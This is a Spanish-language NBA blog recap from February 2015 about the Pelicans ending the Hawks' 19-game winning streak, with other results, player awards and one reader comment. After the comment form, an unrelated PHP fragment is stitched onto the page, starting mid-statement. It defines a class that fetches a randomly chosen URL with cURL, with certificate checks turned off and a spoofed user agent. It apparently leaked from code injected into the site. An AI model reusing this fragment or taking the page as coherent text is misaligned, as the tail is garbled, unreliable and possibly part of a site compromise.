La Crónica: This is the end

03 de February de 2015 por MagicJohnson32

19. No está mal. Nada mal. De hecho, es un registro fabuloso. No hay reproches para los Hawks, perdedores anoche por primera vez desde el 26 de diciembre del año pasado. El honor de poner fin a la racha de Atlanta correspondió a los Pelicans, que además aprovecharon la derrota de los Suns a manos de los Grizzlies para estrechar el cerco en su caza de la octava plaza del Oeste. Ahí siguen también los Thunder, de nuevo sin Durant pero con Westbrook en plan monstruo. El retorno de Ricky Rubio es la otra gran noticia del día.

Lo contamos todo a continuación.

atl_ad

Atlanta Hawks 100 – New Orleans Pelicans 115

Se acabó. La racha victoriosa de los Hawks, una de las más extensas que ha visto la NBA en toda su historia, se queda en 19 por obra y gracia de Anthony Davis y los Pelicans. Desde el prisma de Atlanta, no hay que dar muchas vueltas a los motivos de la derrota: simplemente tenía que llegar un mal partido, más tarde o más temprano, y en todo caso el sufrimiento para superar a los Sixers ya sirvió de aviso. Los Hawks se vieron superados en casi todos los frentes, con Asik & AD dominando el rebote (30 capturas entre ambos, por 32 de todo el equipo rival), y Gordon & Evans a cargo de la distribución (19 asistencias sumaron, las mismas que los Hawks). Por parte de Atlanta, su pareja interior careció de la efectividad que le caracteriza y solo Jeff Teague mostró el nivel que le ha llevado al All Star Game. Los Pelicans dejaron más que probado que no son una mera comparsa en la lucha por la última plaza de Playoffs en el Oeste y, al lograr su sexta victoria en los últimos siete partidos, se sitúan a sólo 1 de los Suns.

Memphis Grizzlies 102 – Phoenix Suns 101

Los Pelicans pueden dirigidir sus tarjetas de agradecimiento a Memphis, más concretamente a Jeff Green, Zach Randolph y Marc Gasol. Entre los tres remontaron un partido que los Suns dominaban por 7 (94-101) a menos de 2 minutos para la conclusión y que se decidió con un 2+1 de Green y un tapón de Marc en el intento sobre la bocina de Markieff Morris. Así evitaron los Grizzlies lo que ya parecía inevitable: poner fin al dominio que vienen ejerciendo sobre los Suns desde hace dos años, periodo durante el cual cada enfrentamiento entre ambas franquicias se resuelve a favor de los de Tennessee. Phoenix hizo méritos para anotarse el triunfo, especialmente durante un parcial de 24-9 en el último cuarto, cuando Hornacek empleó a sus tres bases al mismo tiempo con una fórmula que puso el encuentro muy de cara para los Suns. Sin embargo, un par de pérdidas de Bledsoe (el mejor jugador de la noche), junto al acierto de Randolph y las acciones ya señaladas de Green y Gasol cambiaron el sino del partido y ampliaron la racha de los Grizzlies a 7 victorias consecutivas.

Minnesota Timberwolves 94 – Dallas Mavericks 100

pekrickSin Rondo los Mavs, con Ricky Rubio los Wolves. Lo mismo da, poco tiene que rascar Minnesota en una pista como el American Airles Center de Dallas. El regreso de Ricky después de casi tres meses alejado de las pistas por un esguince grave de tobillo (sumado a las vueltas recientes de Kevin Martin y Pekovic) sirvió al menos para ver a unos Wolves infinitamente más competitivos, capaces recuerarse tras ir 21 abajo y de plantar cara a los Mavs hasta el final. De hecho, a un minuto para la conclusión, la ventaja de los locales era de sólo 2, y fueron 4 puntos de Barea (sustituto de Rondo en el quinteto) los que acabaron sentenciando.

El resto de la jornada

Y de nuevo los Thunder jugaban sin Kevin Durant, esta vez por culpa de un esguince en un dedo de su pie derecho. Sea por unas cosas o por otras la verdad es que el alero de Oklahoma City no está encontrando la regularidad que necesita su equipo para pelear por los Playoffs. Por suerte, en la plantilla también tienen un miura como Russell Westbrook, que se marcó su segundo triple-doble de la temporada para doblegar a los Orlando Magic. Mientras Cleveland superaba el teórico trámite de los Sixers con más problemas de los previstos y conseguía así su undécima victoria seguida, los Clippers caían en Brooklyn por culpa de una canasta en los últimos segundos de Jarrett Jack que remataba una remontada de 9 puntos en el último minuto y medio. Los Nets no quieren que se abra una brecha insalvable entre ellos y la octava posición del Este que ocupan los Hornets, que ayer confirmaron su gran momento de forma gananando a domicilio a los Wizards a pesar de la baja de Kemba Walker. Los de la capital encadenan 3 derrotas consecutivas y anoche perdieron la oportunidad de recortar distancias con los Raptors, que cayeron ante los Bucks a pesar de que estos jugaron sin Brandon Knight. De tota maneras, de los que tendrían que preocuparse todos es de los Cavs, que llegan por detrás como un avión.

PREMIOS

MVP: Ante la enésima baja de Kevin Durant emergió de nuevo la figura de Russell Westbrook, que consiguió su segundo triple-doble de la temporada con 25 puntos, 11 rebotes y 14 asistencias. Y aún se permitió el lujo de robar 4 balones.

Rookie: Desde que debutó Jerami Grant ha ido cerrando las bocas de todos aquellos que decían que era muy mal tirador. Anoche anotó 18 puntos con 3 triples de 5 intentos.

Sorpresa: Khris Middleton ejerció de líder anotador de los Bucks ante la baja de Brandon Knight. Acabó el partido con 25 puntos, 9 rebotes y 3 robos.

Decepción: Terrible partido de Kyle Lowry. El nuevo All-Star de los Raptors anotó sólo 2 puntos y perdió 4 balones en 29 minutos de juego. Tampoco fue el día de su compañero, Lou Williams, que falló 11 de los 12 lanzamientos que intentó.

Esfuerzo en vano: Eric Bledsoe nos deleitó con otro de esos partidos de jugador total que protagoniza cada vez más a menudo pero sus 21 puntos, 8 asistencias, 7 rebotes y 4 robos no fueron suficientes para imponerse a los Grizzlies. Por bien poco, eso sí.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Con la tontería y una vez acabada la racha de los Hawks (chapeau por ellos,muy mal lo deben hacer para caerse del seed 1 del este) parece mentira que sean los Cavaliers quienes tengan en vigor la racha más larga de victorias en 11,a 8 del registro de Atlanta.La siguiente parada es complicada,prueba de fuego para su resurgir defensivo: los Clippers.Posteriormente parece complicado que vayan a sufrir ante Indiana y Lakers,y Miami dudo que ponga el mismo empeño que en el día de Navidad,aunque la Hassanity…Con todo,los Cavaliers están en buena disposición para atacar el factor campo en PO que ahora mismo gozarían los Bulls,y no más allá están los Wizards que tampoco acaban de confirmarse como un verdadero contender al título.

    Rara la conferencia este,quitando Atlanta y Milwaukee,todos los equipos aspirantes a la postemporada van subidos en la montaña rusa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>